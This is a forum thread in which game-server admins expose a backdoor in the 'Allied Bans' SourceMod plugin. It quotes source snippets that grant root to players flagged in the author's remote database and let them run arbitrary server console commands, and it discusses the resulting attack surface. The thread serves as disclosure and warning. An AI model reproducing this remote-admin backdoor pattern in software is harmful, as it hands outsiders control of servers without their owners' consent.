[Raritylicious]

So, there is a system called "Allied Bans" which saves users informations to a Database.
And whoever get banned will not be able to enter the servers that uses "AlliedBans".
Friagram made a thread about this before but I want this thing get cleared.

So as some of you guys know (if you read his thread), lot of korean servers uses it.
And from a looks of it's sourcecode, it's giving alliedbans admins RCON powers.
Some even have full rcon powers I think.
Also. it gives alliedbans admins the reserved slots with full color chat/name/tag.
What bothers me in this part is, they didn't mentione anything obout RCON shits when they released plugin. (compiled SMX of course)
They did mentioned about they getting chat tags stuff and reserved slots.
But this is MY server and they don't have rights to have that kind of powers which I don't want them to have.
And I can't even modify the plugin LOL (little explaination written below)

Yes, I was the guy who friagram mentioned.
And today, I stoped using "Allied Bans" which I should have done that long time ago.

Friagram also told me if server has socket extention and they have full RCON, they can just
extract or delete my server files.
Even put viruses on it.
I spent dollars on my servers making awesome private plugins and maps made by friagram.
And I don't like what "Allied Ban" plugin is capable of.

Asher says he talked to the guy named Tommy who owns AlliedBans and he replied with
"I'll patch it soon"
"Will release sourcecode"
It's been half a year and RCON shits are still sitting there.

I included sourcecode he released
and if you can read korean, on the very top page it says,
"Do not modify this sourcecode and use it without any permissions"
"Modifying this plugin is violating the "license" of "Allied Bans" and you will be "AlliedBaned"

Is this shit even legal?

I didn't violate any of "AlliedBans" "license" so far but probably will get banned anyway for writing this.
So, dear AlliedModders admins, make it worth it.

[friagram]

I spoke with asherkin about this before, as a few different people have brought up this plugin in the past, and I warn them each time about using it when I hear about it. Anyways, this newer version did not change anything, basically the author just left in the remote admin flags, but did so in a more subtle way:

PHP Code:

stock bool:IsRootAdmin(client)
{
    if (client == 0) return true;
    if (Level[client] >= 495) return true;
    
    return false;
} 


So it used to query his db server with a password, but he switched to socket...

PHP Code:

public HandleTAG(String:receiveData[], client) {
    //Parse String
    
    decl String:tagdata[12][128];
    decl String:tagarray[12][256];
    decl String:clientAuth[64],String:bSteamID[64],String:sServername[64],String:sFlag[16];
    decl String:tTagcolor[128], String:tNickcolor[128], String:tChatcolor[128];    
    decl String:leveldata[4][32];
    GetClientAuthString(client, clientAuth, sizeof(clientAuth));
    
    if (StrContains(receiveData, "!ABLEVEL!", false) >= 0) {
        ExplodeString(receiveData,"!ABLEVEL!",leveldata,sizeof(leveldata),sizeof(leveldata[]));
        Format(bSteamID, sizeof(bSteamID), leveldata[1]);
        
        if (StrEqual(bSteamID, clientAuth, false) == true) {
            new mylevel = StringToInt(leveldata[2]);
            Level[client] = mylevel;
            new String:Message[128];
            Format(Message, sizeof(Message), "Your Clearance is LEVEL %d", mylevel);
            PrintToTarget(client, Message);
        }
    } 


Now that's great and all, but let's not forget this little gem:

PHP Code:

public Action:Command_Command(client, args)
{
    if (!IsRootAdmin(client)) {
        ReplyToCommand(client, "[AlliedBANS] You have no access to this command");
        return Plugin_Handled;
    }
    if(args < 1)
    {
        ReplyToCommand(client, "[AlliedBANS] SYNTAX : sm_ab_command <command>");
        ReplyToCommand(client, "[AlliedBANS] USE TO KICK BANNED USERS WHO DO NOT GET KICKED AUTOMATICALLY");
        return Plugin_Handled;
    }
    new String:Commands[512];
    GetCmdArgString(Commands, sizeof(Commands));

    if (client == 0) // They will already see the response in the console.
    {
        ServerCommand("%s", Commands);
    } else {
        decl String:responseBuffer[4096];
        decl String:exploded[256][16];
        
        ServerCommandEx(responseBuffer, sizeof(responseBuffer), "%s", Commands);
        new segments = ExplodeString(responseBuffer, "\n", exploded, 16, 256, false);
        if (segments > 0) {
            ReplyToCommand(client, "### Start ###");
            for (new i = 0; i < segments; i++) {
                ReplyToCommand(client, "%s\n", exploded[i]);
            }
            ReplyToCommand(client, "### End ###");
        }
        ReplyToCommand(client, responseBuffer);
    }

    return Plugin_Handled;
} 


new mylevel = StringToInt(leveldata[2]);
grabs the player's "level" from his database, preivously, when I logged in and queried his database to get the levels of all of the players, there were some 20+ individuals that would have been "given" root access alone (note that this was as ~4 months ago, so the user list may have changed). Though, anyone could be added at any time, since it basically just queries that db (which you have no control over). Also since this thing just queries tommy.or.kr via tcp to get this info, any attacker could use simple DNS hijacking to gain access (though perhaps unlikely)

I spoke with asherkin and got this response:

Quote:

05-12-14 , 08:22 AM Allied Bans (Kr) Hey friagram, Whoah! This one looks like it could be a mess. I've moved your thread into a private forum for a bit while I look at it - the scope is quite massive and could be dire. Thanks for the notice, I'll make the thread public again once we've got a better grasp of what's going on. I noticed you're currently editing the thread, that'll probably fail - just PM me if there's anything else you'd like to add. Regards, Asher

and again:

Quote:

05-12-14 , 10:58 AM Re: Allied Bans (Kr) Originally Posted by friagram I didn't spend tons of time looking it over, but from what I saw and heared, there's a fair amount of people that run it. I told my Korean friends to just not use it, but they said that then all of the hackers/spammers/scammers would then start coming to their servers. Anyways, hard to tell looking at the queries just how many people use it, since I can't really query everything or dump the structure. I had a long discussion with the author earlier, he's working towards getting an update out with full source code and less questionable admin access bits. Thanks again, Asher

As per the rcon/socket/updater mentions. While perhaps unlikely, this particular combination does create an enormous attack surface as you have:
1) admin
2) console access
3) ability to update plugins and thus use the entire sourcemod API to modify the filesystem
4) socket to do anything you want via TCP/UDP

So.. it would technically be possible for them to update the plugin, install other plugins/extensions, programs... Delete files that are not protected by the user. Perhaps even run system commands if your user privileges are not locked down.

[Sreaper]

Quote:

Originally Posted by Raritylicious "Modifying this plugin is violating the "license" of AlliedBans and you will be "AlliedBaned"

So in addition to backdoor admin, they are also claiming to manually add you to their ban list even if you aren't a cheater/scammer. You shouldn't run someone else's ban list unless you know the person very well. Who knows how many innocent people you've been keeping off your servers.

[Raritylicious]

Quote:

Originally Posted by Sreaper So in addition to backdoor admin, they are also claiming to manually add you to their ban list even if you aren't a cheater/scammer. You shouldn't run someone else's ban list unless you know the person very well. Who knows how many innocent people you've been keeping off your servers.

I regret using it
And I disabled it as well
And you're absolutely right
I can't claim what I'm about to say is 100 percent true but,
From what I heard there were actually misunderstood innocent players got "Allied Banned"
I once got banned as well for sharing "similar match" of a hacker's IP address lol

Their power is too strong
Beyong you can imagine
This has to change

[GoD-Tony]

FYI, the sourcecode they're hosting is version "2.3.004A", and the smx is "3.140902A".

[lionheart1066]

This is why you'd be better off building up your own ban list with something like Sourcebans instead of depending on someone elses ban list. And of course get a team of people that would be able to administrate your server according to the rules you set, along with the assistance of any plugins.

[Raritylicious]

I thought maybe someone who are related to SM license stuff might read this and take an action or something.
I guess I was wrong.

[ddhoward]

Quote:

Originally Posted by Raritylicious I thought maybe someone who are related to SM license stuff might read this and take an action or something. I guess I was wrong.

What 'action' could be taken?

It's kind of hard for a US-based organization to take any action against South Koreans in South Korea for violating US law.

[ocwoody]

Quote:

Originally Posted by ddhoward What 'action' could be taken? It's kind of hard for a US-based organization to take any action against South Koreans in South Korea for violating US law.

Isn't there a blacklist function built into sourcemod just for these types of plugins?

[ddhoward]

Quote:

Originally Posted by ocwoody Isn't there a blacklist function built into sourcemod just for these types of plugins?

I assume that it would be very possible to simply recompile Sourcemod without the blacklist.